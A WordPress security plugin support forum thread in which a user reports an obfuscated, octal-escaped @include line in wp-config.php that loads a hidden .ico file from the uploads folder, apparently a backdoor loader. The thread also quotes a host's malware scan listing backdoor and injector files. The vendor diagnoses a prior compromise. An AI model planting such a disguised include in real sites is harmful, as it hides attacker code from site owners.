BPS missed something odd Case 1

Home Forums BulletProof Security Pro BPS missed something odd Case 1

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • April 3, 2020 at 5:16 pm #38835
    BHA
    Participant

    So I noticed on one of my installs it missed the following in the wp-config.php. I just happened to stumble across it.

    <?php
/*9ba70*/

@include "\057home\064/boy\144hana\057publ\151c_ht\155l/th\145last\157utpo\163thaw\141ii/w\160-con\164ent/\165ploa\144s/20\0618/.6\071e36d\0621.ic\157";

/*9ba70*/

/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:

    *

    April 3, 2020 at 9:02 pm #38837
    AITpro Admin
    Keymaster

    That code is definitely not standard.  Did you add it yourself at some point?  I’m pretty sure that adding an “include” in your wp-config.php file is going to cause header errors.

    April 4, 2020 at 5:10 am #38839
    BHA
    Participant

    Nope, I didn’t do it. I contacted Bluehost to see if it was something they did. They said no and ran a malware scanner with the results below. Is there a way for BPS Pro to address this? I’m assuming the MSCAN is too out of date to catch this.

    If AIT Pro would like the files for analysis feel free to let me know.

     

    $WP_ROOT/wp-content/bps-backup/quarantine/wp-content/plugins/mojo-marketplace-wp-plugin/mojo-marketplace.php: SL-PHP-BACKDOOR-GENERIC-aqw.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/quarantine/wp-content/plugins/ap-extended-mime-types/moljkojr.php: SL-PHP-INJECTOR-1-evc.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/quarantine/wp-content/plugins/404-to-301/includes/lagpbzdc.php: SL-PHP-EVAL_REQUEST-awux.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/autorestore/wp-content/themes/twentynineteen/classes/nmczmsfs.php: SL-PHP-BACKDOOR-GENERIC-bds.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/autorestore/wp-content/themes/twentytwenty/inc/ejtyhkoq.php: SL-PHP-BACKDOOR-GENERIC-awp.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-taxonomy-endpoint.php: SL-PHP-BACKDOOR-GENERIC-awq.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/uploads/2019/.4c84f789.ico: SL-PHP-BACKDOOR-GENERIC-arj.UNOFFICIAL FOUND

    April 4, 2020 at 10:33 am #38840
    AITpro Admin
    Keymaster

    Yeah it looks like your hosting account was already hacked before you purchased BPS Pro going by the date you purchased BPS Pro a few weeks ago.  BPS Pro is designed to protect your websites and hosting accounts from being hacked, but unfortunately once your hosting account/websites are already hacked then you need to do a hosting account hack clean up first.  I created a forum topic here on how to do that >  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/. I’d be glad to do that for you for a reasonable cost.  If you want to go that route then we can discuss a fair price.  You can use my contact form here > https://www.ait-pro.com/contact/

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.